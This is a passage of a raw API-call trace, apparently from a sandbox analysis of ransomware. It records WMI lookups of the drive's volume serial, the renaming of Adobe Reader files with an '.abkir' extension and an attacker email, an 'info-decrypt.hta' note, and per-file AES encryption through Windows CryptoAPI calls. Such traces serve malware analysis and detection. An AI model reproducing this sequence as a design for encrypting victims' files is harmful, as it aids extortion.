CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0199.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6029f80) returned 0x0 [0199.898] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0199.898] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0199.898] WbemDefPath:IWbemPath:SetText (This=0x6029f80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0199.898] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0199.898] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0199.898] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.898] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0199.898] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0199.898] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0199.898] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.899] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024b18) returned 0x0 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0199.899] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024b18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027180) returned 0x0 [0199.899] WbemLocator:IUnknown:Release (This=0x6024b18) returned 0x0 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027180) returned 0x0 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0199.899] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0199.899] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0199.899] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0199.899] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0199.899] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0199.900] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0199.900] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0199.900] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0199.900] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027180) returned 0x0 [0199.900] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0199.900] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0199.900] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0199.900] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0199.900] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.900] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60271c0) returned 0x0 [0199.900] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033794) returned 0x0 [0199.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5bb84) returned 0x0 [0199.928] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bb84, pProxy=0x6033794, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0199.928] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x1 [0199.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5bba4) returned 0x0 [0199.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5bb84) returned 0x0 [0199.928] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bb84, pProxy=0x6033794, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0199.928] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x2 [0199.928] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x1 [0199.928] CoTaskMemFree (pv=0xbd4858) [0199.929] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0199.929] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5bba4) returned 0x0 [0199.929] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0199.929] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0199.930] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0199.930] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0199.930] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0199.930] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5bb04) returned 0x0 [0199.930] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bb04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.931] WbemLocator:IUnknown:Release (This=0xb5bb04) returned 0x3 [0199.931] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0199.931] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0199.931] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5bb8c) returned 0x0 [0199.931] WbemLocator:IRpcOptions:Query (in: This=0xb5bb8c, pPrx=0xb5bba4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0199.931] WbemLocator:IUnknown:Release (This=0xb5bb8c) returned 0x3 [0199.931] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0199.931] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0199.931] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0199.931] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033794) returned 0x0 [0199.931] WbemLocator:IUnknown:AddRef (This=0x6033794) returned 0x4 [0199.931] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x3 [0199.931] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x2 [0199.931] SysStringLen (param_1=0x0) returned 0x0 [0199.931] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0199.931] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0199.931] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.932] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0199.932] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0199.932] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5bba4) returned 0x0 [0199.932] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x3 [0199.932] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0199.932] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0199.932] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.932] IWbemServices:GetObject (in: This=0x6033794, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0199.950] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0199.950] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0199.950] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.950] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3777ae0*=0, plFlavor=0x3777ae4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3777ae0*=8, plFlavor=0x3777ae4*=0) returned 0x0 [0199.950] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.950] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.950] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3777ae0*=8, plFlavor=0x3777ae4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3777ae0*=8, plFlavor=0x3777ae4*=0) returned 0x0 [0199.950] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.951] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.951] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", lpFilePart=0x0) returned 0x36 [0199.951] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0199.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0199.951] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x30df8b80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0199.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0199.951] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0199.952] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", lpFilePart=0x0) returned 0x34 [0199.952] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0199.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0199.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0199.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0199.952] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", lpFilePart=0x0) returned 0x34 [0199.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0199.953] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), fInfoLevelId=0x0, lpFileInformation=0x3778014 | out: lpFileInformation=0x3778014*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8)) returned 1 [0199.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0199.953] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", lpFilePart=0x0) returned 0x34 [0199.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0199.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0199.953] GetFileType (hFile=0x4e0) returned 0x1 [0199.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0199.953] GetFileType (hFile=0x4e0) returned 0x1 [0199.953] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x17b8 [0199.954] ReadFile (in: hFile=0x4e0, lpBuffer=0x37781dc, nNumberOfBytesToRead=0x17b8, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37781dc*, lpNumberOfBytesRead=0x8f6eedc*=0x17b8, lpOverlapped=0x0) returned 1 [0201.195] CloseHandle (hObject=0x4e0) returned 1 [0201.195] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe0690) returned 1 [0201.196] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x3691ac4 | out: pbBuffer=0x3691ac4) returned 1 [0201.662] CryptImportKey (in: hProv=0xbe0690, pbData=0x37527c4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f010) returned 1 [0201.662] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.662] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.662] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fbd0) returned 1 [0201.662] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.662] CryptSetKeyParam (hKey=0xb7fbd0, dwParam=0x4, pbData=0x37528a4*=0x1, dwFlags=0x0) returned 1 [0201.662] CryptSetKeyParam (hKey=0xb7fbd0, dwParam=0x1, pbData=0x3752870, dwFlags=0x0) returned 1 [0201.662] CryptEncrypt (in: hKey=0xb7fbd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37528b4*, pdwDataLen=0x8f6eea8*=0x17c0, dwBufLen=0x17c0 | out: pbData=0x37528b4*, pdwDataLen=0x8f6eea8*=0x17c0) returned 1 [0201.662] CryptEncrypt (in: hKey=0xb7fbd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3754098*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3754098*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0201.664] CryptDestroyKey (hKey=0xb7f010) returned 1 [0201.664] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0201.664] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0201.664] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", lpFilePart=0x0) returned 0x34 [0201.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0201.664] CreateFileW (lpFileName="C:\\Program 